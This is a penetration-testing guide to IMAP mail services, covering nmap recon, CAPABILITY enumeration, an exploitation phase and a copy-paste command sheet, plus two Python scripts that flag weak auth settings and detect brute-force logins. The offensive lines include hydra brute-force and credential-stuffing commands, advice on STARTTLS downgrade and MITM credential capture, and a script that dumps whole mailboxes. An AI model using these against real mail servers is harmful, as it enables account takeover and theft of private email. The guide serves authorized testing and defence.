143 — IMAP (Internet Message Access Protocol)

A guide to enumeration and assessment of IMAP mail services

0) What is IMAP?

IMAP (Internet Message Access Protocol) is a protocol for accessing and managing email on a remote server while keeping messages on the server. It normally listens on TCP port 143 (plaintext + STARTTLS) and on 993 for IMAPS (TLS). IMAP allows clients to list mailboxes, fetch message headers/bodies, and manipulate flags—making it a high-value target if authentication or transport security is weak.

1) Recon Phase
- Service discovery & banner: nmap -sV -p 143 [target]
- Check STARTTLS/IMAPS support: nmap -p 143 --script ssl-enum-ciphers,imap-capabilities [target]
- Check IMAP on 993 (IMAPS): nmap -sV -p 993 [target]
- Passive recon: look up MX records (dig MX [domain]) to find mail hosts

Record server software (Dovecot, Courier, Microsoft Exchange), supported AUTH mechanisms, and whether TLS (STARTTLS/IMAPS) is enforced.

2) Enumeration Phase
- Banner & CAPABILITY: use openssl / nc to connect and read the server greeting and CAPABILITY list
    openssl s_client -starttls imap -connect [target]:143 -crlf
- List mailboxes and capabilities (manual IMAP commands):
    A001 CAPABILITY
    A002 LIST "" "*"
- Check AUTH mechanisms (PLAIN, LOGIN, CRAM-MD5, DIGEST-MD5, NTLM, GSSAPI)
- Automated enumeration:
    nmap --script=imap-capabilities,imap-brute -p 143 [target]
- Username discovery: use timing/response differences with valid/invalid attempts, or use mailbox naming conventions discovered via MX/OSINT

Look for servers that allow plaintext authentication (AUTH PLAIN/LOGIN over unencrypted channel) or accept weak mechanisms. Note support for SASL/NTLM/GSSAPI which affects brute-force strategies.
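The CAPABILITY check above is easy to do by eye for one host but tedious across a fleet. The following is an added example (not part of the original cheatsheet) that parses the CAPABILITY list a server advertises on port 143 before STARTTLS and reports exactly the weaknesses this section says to look for: no STARTTLS, LOGIN accepted in cleartext (no LOGINDISABLED, per RFC 3501), plaintext SASL mechanisms offered before TLS, and legacy challenge-response mechanisms. The two sample responses are constructed, and `fetch_capabilities` is an assumed helper showing how the same check would be run against a live server with the standard-library `imaplib`.

```python
"""Assess an IMAP CAPABILITY response for weak auth/transport settings.

Added example for this page, not code from the original cheatsheet. The
sample CAPABILITY lines are constructed, not captured from a real host.
"""
import imaplib
import ssl
from dataclasses import dataclass, field

# Mechanisms that transmit the password (or a trivially reversible form)
PLAINTEXT_MECHS = {"PLAIN", "LOGIN"}
# Legacy challenge-response mechanisms that are weak by today's standards
WEAK_CHALLENGE_MECHS = {"CRAM-MD5", "DIGEST-MD5", "NTLM"}


@dataclass
class CapabilityAssessment:
    capabilities: set[str]
    auth_mechs: set[str]
    findings: list[str] = field(default_factory=list)


def parse_capability(line: str) -> CapabilityAssessment:
    """Parse '* CAPABILITY IMAP4rev1 STARTTLS AUTH=PLAIN ...' or a bare token list."""
    tokens = line.strip().split()
    if tokens[:2] == ["*", "CAPABILITY"]:
        tokens = tokens[2:]
    caps = {t.upper() for t in tokens}
    mechs = {c.split("=", 1)[1] for c in caps if c.startswith("AUTH=")}
    return CapabilityAssessment(capabilities=caps, auth_mechs=mechs)


def assess_cleartext_capabilities(line: str) -> CapabilityAssessment:
    """Evaluate the CAPABILITY list as seen on port 143 *before* STARTTLS.

    Anything flagged here means credentials can reach the server unprotected.
    """
    a = parse_capability(line)
    caps = a.capabilities
    if "STARTTLS" not in caps:
        a.findings.append("STARTTLS not offered: no way to protect credentials on 143")
    # RFC 3501: LOGINDISABLED tells clients LOGIN is refused until TLS is up.
    # Without it, the plain LOGIN command is accepted over cleartext.
    if "LOGINDISABLED" not in caps:
        a.findings.append("LOGIN command accepted over cleartext (LOGINDISABLED missing)")
    exposed = a.auth_mechs & PLAINTEXT_MECHS
    if exposed:
        a.findings.append(f"Plaintext SASL mechanisms advertised before TLS: {sorted(exposed)}")
    weak = a.auth_mechs & WEAK_CHALLENGE_MECHS
    if weak:
        a.findings.append(f"Legacy challenge-response mechanisms advertised: {sorted(weak)}")
    return a


def fetch_capabilities(host: str, port: int = 143, timeout: float = 10.0) -> tuple[str, str]:
    """Assumed live-check helper: return the CAPABILITY lists before and after
    STARTTLS. imaplib refreshes .capabilities after a successful starttls()."""
    conn = imaplib.IMAP4(host, port, timeout=timeout)
    before = " ".join(conn.capabilities)
    conn.starttls(ssl_context=ssl.create_default_context())
    after = " ".join(conn.capabilities)
    conn.logout()
    return before, after


# Constructed CAPABILITY responses for demonstration (not from a real server)
WEAK_SAMPLE = "* CAPABILITY IMAP4rev1 AUTH=PLAIN AUTH=LOGIN AUTH=CRAM-MD5 IDLE"
HARDENED_SAMPLE = "* CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED IDLE"

if __name__ == "__main__":
    for label, sample in (("weak", WEAK_SAMPLE), ("hardened", HARDENED_SAMPLE)):
        result = assess_cleartext_capabilities(sample)
        print(f"[{label}] {len(result.findings)} finding(s)")
        for finding in result.findings:
            print("  -", finding)
```

Run the script as-is to see the weak sample produce four findings and the hardened sample none; point `fetch_capabilities` at a host you administer and feed its first return value to `assess_cleartext_capabilities` to check a real server. The hardened server will still advertise `AUTH=PLAIN` in the post-STARTTLS list, which is fine: the check is specifically about what is offered before the channel is encrypted.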

3) Exploitation Phase
- Credential harvesting (authorized only): use valid creds to LIST mailboxes and FETCH/download messages
- Brute force / credential stuffing (authorized only):
    hydra -L users.txt -P passwords.txt imap://[target]
- Exploit STARTTLS downgrade or MITM in untrusted networks to capture plaintext auth (authorized lab use)
- If private keys or reset emails exist in mailboxes, use them to pivot to other services
- Use Python's imaplib for scripted retrieval once credentials are obtained

Focus on acquiring mailbox contents that contain secrets (password resets, API keys), and on finding credentials that work for other services. Respect legal/ethical boundaries—do not access mailboxes without permission.
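On the server side, the brute-force and credential-stuffing activity described in this phase leaves a very recognisable trail in the IMAP login log. The following is an added example (not part of the original cheatsheet and not a Dovecot component) that parses `imap-login` lines modelled on Dovecot's format, aggregates failures per source address, and raises alerts for repeated failed authentication, password spraying across several usernames, a success from a source that had just been failing, and logins that completed without TLS. The log lines are constructed for the demonstration; the thresholds are assumptions to tune for your environment.

```python
"""Detect IMAP password guessing and cleartext logins in Dovecot-style logs.

Added example for this page, not from the original cheatsheet. The sample
lines are constructed and modelled on Dovecot's imap-login messages.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+dovecot: imap-login: "
    r"(?P<event>Login|Disconnected|Aborted login)"
    r"(?:[^:]*\(auth failed, (?P<attempts>\d+) attempts in \d+ secs\))?"
    r".*?user=<(?P<user>[^>]*)>"
    r"(?:, method=(?P<method>[\w-]+))?"
    r", rip=(?P<rip>[0-9a-fA-F.:]+)"
)
TLS_RE = re.compile(r", (TLS|secured)\b")   # Dovecot marks protected sessions this way

FAILED_ATTEMPT_THRESHOLD = 5   # assumed: failed passwords from one source before alerting
USER_SPRAY_THRESHOLD = 3       # assumed: distinct usernames tried from one source


@dataclass
class SourceStats:
    failed_attempts: int = 0
    users_tried: set = field(default_factory=set)


def parse_line(line: str):
    """Return the fields of an imap-login line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["attempts"] = int(ev["attempts"]) if ev["attempts"] else 0
    ev["tls"] = bool(TLS_RE.search(line))
    return ev


def analyse(lines):
    """Aggregate events per source IP (rip) and return a sorted list of alerts."""
    stats = defaultdict(SourceStats)
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        s = stats[ev["rip"]]
        if ev["event"] == "Disconnected" and ev["attempts"]:
            s.failed_attempts += ev["attempts"]
            if ev["user"]:
                s.users_tried.add(ev["user"])
        elif ev["event"] == "Login":
            if s.failed_attempts:
                # A success right after failures from the same source is the
                # case that matters most: one of the guesses may have worked.
                alerts.append(f"{ev['rip']}: successful login for {ev['user']} "
                              f"after {s.failed_attempts} failed attempts")
            if not ev["tls"]:
                alerts.append(f"{ev['rip']}: cleartext login for {ev['user']} "
                              f"via {ev['method']} (no TLS)")
    for rip, s in stats.items():
        if s.failed_attempts >= FAILED_ATTEMPT_THRESHOLD:
            alerts.append(f"{rip}: {s.failed_attempts} failed IMAP auth attempts")
        if len(s.users_tried) >= USER_SPRAY_THRESHOLD:
            alerts.append(f"{rip}: password spraying across {len(s.users_tried)} users")
    return sorted(alerts)


# Constructed sample log (documentation-range addresses, not a real capture)
SAMPLE_LOG = """\
Dec 12 10:00:01 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=203.0.113.5, lip=192.0.2.10, TLS, session=<c1>
Dec 12 10:00:03 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 4 secs): user=<bob>, method=PLAIN, rip=203.0.113.5, lip=192.0.2.10, TLS, session=<c2>
Dec 12 10:00:05 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 3 secs): user=<carol>, method=LOGIN, rip=203.0.113.5, lip=192.0.2.10, TLS, session=<c3>
Dec 12 10:00:09 mail dovecot: imap-login: Login: user=<carol>, method=PLAIN, rip=203.0.113.5, lip=192.0.2.10, mpid=4242, TLS, session=<c4>
Dec 12 10:01:00 mail dovecot: imap-login: Login: user=<dave>, method=PLAIN, rip=198.51.100.7, lip=192.0.2.10, mpid=4243, session=<c5>
Dec 12 10:01:30 mail dovecot: imap-login: Aborted login (no auth attempts in 0 secs): user=<>, rip=198.51.100.8, lip=192.0.2.10, session=<c6>
Dec 12 10:02:00 mail dovecot: imap-login: Login: user=<erin>, method=PLAIN, rip=192.0.2.55, lip=192.0.2.10, mpid=4244, TLS, session=<c7>
"""

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG.splitlines()):
        print(alert)
```

Feed it `journalctl -u dovecot` or `/var/log/mail.log` on a server you run. The cleartext-login alert is the detection counterpart of the STARTTLS-downgrade item above: if a client completed a login without TLS, either the server permits it or something stripped the upgrade, and both deserve attention.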

IMAP Info — What to Look For

Tools Required

sudo apt install nmap openssl netcat hydra python3
# Useful Python tooling: imaplib (stdlib), imapclient
# Nmap NSE scripts: imap-capabilities, imap-brute

Quick copy-paste command cheatsheet

# discovery & capabilities
nmap -sV -p 143 --script=imap-capabilities,imap-brute [target]
nmap -sV -p 993 [target]    # IMAPS

# check STARTTLS & banner
openssl s_client -starttls imap -connect [target]:143 -crlf

# manual IMAP session (example)
# connect with nc and issue IMAP commands
nc [target] 143
A001 CAPABILITY
A002 LIST "" "*"

# brute-force (authorized only)
hydra -L users.txt -P passwords.txt imap://[target]

# Python quick retrieval (example - authorized only)
python3 - <<'PY'
import imaplib
M = imaplib.IMAP4_SSL('[target]')        # IMAPS, port 993 by default
M.login('username', 'password')
M.select('INBOX')
typ, data = M.search(None, 'ALL')        # data[0]: space-separated message numbers
for num in data[0].split():
    typ, msg = M.fetch(num, '(RFC822)')  # msg[0][1] holds the raw message bytes
    print(msg[0][1][:200])  # preview
M.logout()
PY

Disclaimer: Use these techniques only on systems and mailboxes you own or are explicitly authorized to test. Accessing others' email or intercepting credentials without permission is illegal and unethical.